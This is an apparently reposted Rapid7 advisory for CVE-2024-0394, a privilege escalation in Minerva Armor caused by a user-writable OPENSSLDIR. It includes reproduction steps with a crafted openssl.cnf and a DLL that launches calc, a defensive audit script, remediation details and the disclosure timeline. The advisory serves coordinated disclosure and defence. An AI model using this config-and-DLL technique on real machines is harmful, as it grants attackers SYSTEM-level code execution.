National Cyber Warfare Foundation (NCWF) Forums


CVE-2024-0394: Rapid7 Minerva Armor Privilege Escalation (FIXED)


2024-04-03 13:05:11
milo
Red Team (CNA)

Rapid7 is disclosing CVE-2024-0394, a privilege escalation vulnerability in Rapid7 Minerva’s Armor product family. The root cause of this vulnerability is Minerva’s implementation of OpenSSL’s OPENSSLDIR parameter, which was set to a path accessible to low-privileged users.


Rapid7 is disclosing CVE-2024-0394, a privilege escalation vulnerability in Rapid7 Minerva’s Armor product family. Minerva uses the open-source OpenSSL library for cryptographic functions and to support secure communications. The root cause of this vulnerability is Minerva’s implementation of OpenSSL’s OPENSSLDIR parameter, which was set to a path accessible to low-privileged users (such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf). Rapid7 has assessed this vulnerability as having a CVSSv3 score of 7.8.


Impact


Since Minerva Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged attacker can create an openssl.cnf configuration file to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.


Credit


Rapid7 would like to thank Will Dormann of Vul Labs for disclosing this vulnerability to us in accordance with Rapid7's vulnerability disclosure policy. We are grateful to Will and the security research community for their work to make software and systems safer for everyone.


Product Description


Minerva Armor technology is a core endpoint security component (Windows only) aimed at preventing evasive malware, ransomware, and advanced cyber attacks. Armor is operated and trusted by SMBs and enterprise organizations around the world across a diversity of sectors and verticals.


Minerva Armor technology was developed by Minerva Labs, which was acquired by Rapid7 in March 2023. Armor is part of a product family that includes Minerva Armor and Rapid7 next-generation antivirus (NGAV). Armor was previously used as an OEM component in Intego AV. Note: The Insight agent is not vulnerable to this issue.


Exploitation


During the Armor 32-bit service startup (MVArmorService32.exe), Armor loads the OpenSSL library. OpenSSL is a library that provides a variety of cryptographic functions. This library has an internal directory tree that is used to locate the configuration file; this directory is called OPENSSLDIR. Inside OPENSSLDIR resides the configuration file openssl.cnf. This is where the privilege escalation opportunity begins.


An application that depends on the OpenSSL library must have the full path of OPENSSLDIR specified at compile time, but the path does not need to exist at run time. Because the path is compiled into the binary, it can be discovered using reverse engineering techniques and tools such as strings, ProcMon, and others.


If an attacker can place the openssl.cnf file and specify a malicious library for loading, the attacker's code is executed instead. The root cause of this vulnerability lies in the OpenSSL library’s configuration in Minerva, where the OPENSSLDIR parameter was set to a path accessible to low-privileged users, such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf. Since Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged user can create the openssl.cnf configuration file mentioned above to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.


Below is a ProcMon capture of the Armor service looking for the openssl.cnf file:


[Image: ProcMon capture of the Armor service (MVArmorService32.exe) looking for openssl.cnf]


Steps To Reproduce


All steps are executed as a low-privileged authenticated user:



  1. Create a "C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static" directory:

    mkdir "C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static"

  2. Create an openssl.cnf file in that directory with the following contents:

    openssl_conf = openssl_init
    [openssl_init]
    engines = engine_section
    [engine_section]
    woot = woot_section
    [woot_section]
    engine_id = woot
    dynamic_path = c:\\danik\\calc.dll
    init = 0

  3. Create the c:\danik folder:

    mkdir "C:\danik"

  4. Compile and link a malicious "OpenSSL library" — the code below will run Windows calculator:

    #include <windows.h>
    #include <stdlib.h>   /* system() */

    BOOL WINAPI DllMain(
        HINSTANCE hinstDLL,
        DWORD fdwReason,
        LPVOID lpReserved )
    {
        switch( fdwReason )
        {
        case DLL_PROCESS_ATTACH:
            /* Runs as soon as the service loads the "engine" DLL. */
            system("calc");
            break;
        case DLL_THREAD_ATTACH:
            // Do thread-specific initialization.
            break;
        case DLL_THREAD_DETACH:
            // Do thread-specific cleanup.
            break;
        case DLL_PROCESS_DETACH:
            // Perform any necessary cleanup.
            break;
        }
        return TRUE; // Successful DLL_PROCESS_ATTACH.
    }

  5. Copy calc.dll from above to the "C:\danik" directory.

  6. Restart the Armor service or the whole machine.
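The following audit helper is an added example and is not Rapid7's or Minerva's code. It performs, from the defender's side, the two checks the Exploitation section and the steps above imply: recovering the compile-time OPENSSLDIR from a binary image (the same literal a strings scan would reveal) and flagging it when it lies outside administrator-only directories, then parsing any openssl.cnf found there to list every engine library it would load through dynamic_path. The protected-root list is an assumption about default Windows ACLs, the sample "binary" bytes are constructed, and the sample configuration is the one from the reproduction steps.

```python
"""Audit helper for the OPENSSLDIR weakness (added example, not Rapid7's code).

Checks performed:
  1. recover the build-time OPENSSLDIR string from a binary image and flag
     it when it is outside admin-only roots;
  2. parse an openssl.cnf and list every engine loaded via dynamic_path.
Sample inputs are constructed, not captured from the product.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# OpenSSL embeds its build-time configuration directory as the literal
# OPENSSLDIR: "<path>" (what OpenSSL_version(OPENSSL_DIR) returns), so it
# survives in the static library linked into the service binary.
OPENSSLDIR_RE = re.compile(rb'OPENSSLDIR: "([^"]+)"')

# Assumption: on a default Windows install only administrators can write
# under these roots. Anything else, including a directory that does not
# exist yet and could be created by an ordinary user, is treated as
# reachable by low-privileged users.
PROTECTED_ROOTS = (
    PureWindowsPath(r"C:\Program Files"),
    PureWindowsPath(r"C:\Program Files (x86)"),
    PureWindowsPath(r"C:\Windows"),
)

# Constructed sample "binary": the advisory's OPENSSLDIR string padded with
# filler bytes to mimic surrounding code.
SAMPLE_IMAGE = (
    b"\x00\x90\x90"
    b'OPENSSLDIR: "C:\\git\\vcpkg\\packages\\openssl_x86-windows-static-vs2019-static"'
    b"\x00\xcc\xcc"
)

# The openssl.cnf from the reproduction steps, used here as sample input.
SAMPLE_CNF = r"""
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\danik\\calc.dll
init = 0
"""


def extract_openssldir(image: bytes) -> Optional[str]:
    """Return the OPENSSLDIR baked into a binary image, or None if absent."""
    match = OPENSSLDIR_RE.search(image)
    return match.group(1).decode("latin-1") if match else None


def is_protected_path(path: str) -> bool:
    """True if the path is one of the admin-only roots or lies under one."""
    p = PureWindowsPath(path)
    return any(p == root or root in p.parents for root in PROTECTED_ROOTS)


def _unescape(value: str) -> str:
    # openssl.cnf treats backslash as an escape character: "\\" is one "\".
    return re.sub(r"\\(.)", r"\1", value)


def parse_engine_paths(cnf_text: str) -> Dict[str, str]:
    """Follow openssl_conf -> engines -> per-engine sections and return
    {engine_id: dynamic_path}. Only the '[section]' / 'key = value' subset
    of openssl.cnf syntax used by the engine mechanism is handled."""
    sections: Dict[str, Dict[str, str]] = {"default": {}}
    current = sections["default"]
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip(), {})
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            current[key] = _unescape(value)

    init_section = sections["default"].get("openssl_conf") or ""
    engines_section = sections.get(init_section, {}).get("engines")
    if not engines_section:
        return {}
    found: Dict[str, str] = {}
    for _, engine_section in sections.get(engines_section, {}).items():
        body = sections.get(engine_section, {})
        if "dynamic_path" in body:
            found[body.get("engine_id", engine_section)] = body["dynamic_path"]
    return found


def audit(image: bytes, cnf_text: Optional[str]) -> List[str]:
    """Combine both checks into a list of human-readable findings."""
    openssldir = extract_openssldir(image)
    if openssldir is None:
        return ["no OPENSSLDIR string in this image (check libcrypto if linked dynamically)"]
    findings: List[str] = []
    if not is_protected_path(openssldir):
        findings.append(f"OPENSSLDIR {openssldir} is outside admin-only roots")
    if cnf_text is not None:
        for engine_id, dll in parse_engine_paths(cnf_text).items():
            findings.append(f"openssl.cnf loads engine {engine_id} from {dll}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_IMAGE, SAMPLE_CNF):
        print(finding)
```

In practice the image bytes come from the service executable and the configuration text from OPENSSLDIR\openssl.cnf if that file exists; a non-existent OPENSSLDIR is still a finding, because whoever can write the nearest existing ancestor can create it.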


Remediation


To remediate CVE-2024-0394, Minerva customers should update to the latest release:

    Customers                      Remediated version
    Minerva customers              Armor version 4.5.5
    Minerva Armor OEM customers    Armor OEM version 4.5.5

Disclosure Timeline


January 8, 2024: Issue reported to Rapid7 by Will Dormann of Vul Labs

January 9, 2024: Rapid7 acknowledges report

January 11, 2024: Rapid7 reproduces issue, confirms vulnerability

January - February 2024: Rapid7 engineering team develops and tests fix, requests information from partner on potentially vulnerable implementation; partner confirms they are no longer offering vulnerable implementation.

March 12, 2024: Rapid7 contacts reporter to ask whether our fix timeline had been previously communicated

March 19, 2024: Rapid7 assigns CVE, updates reporter on fix readiness, confirms affected/fixed versions. Rapid7 and reporter agree on April 3, 2024 as a coordinated disclosure date.

April 3, 2024: This disclosure; fix released.




Source: Rapid7
Source Link: https://blog.rapid7.com/2024/04/03/cve-2024-0394-rapid7-minerva-armor-privilege-escalation-fixed/

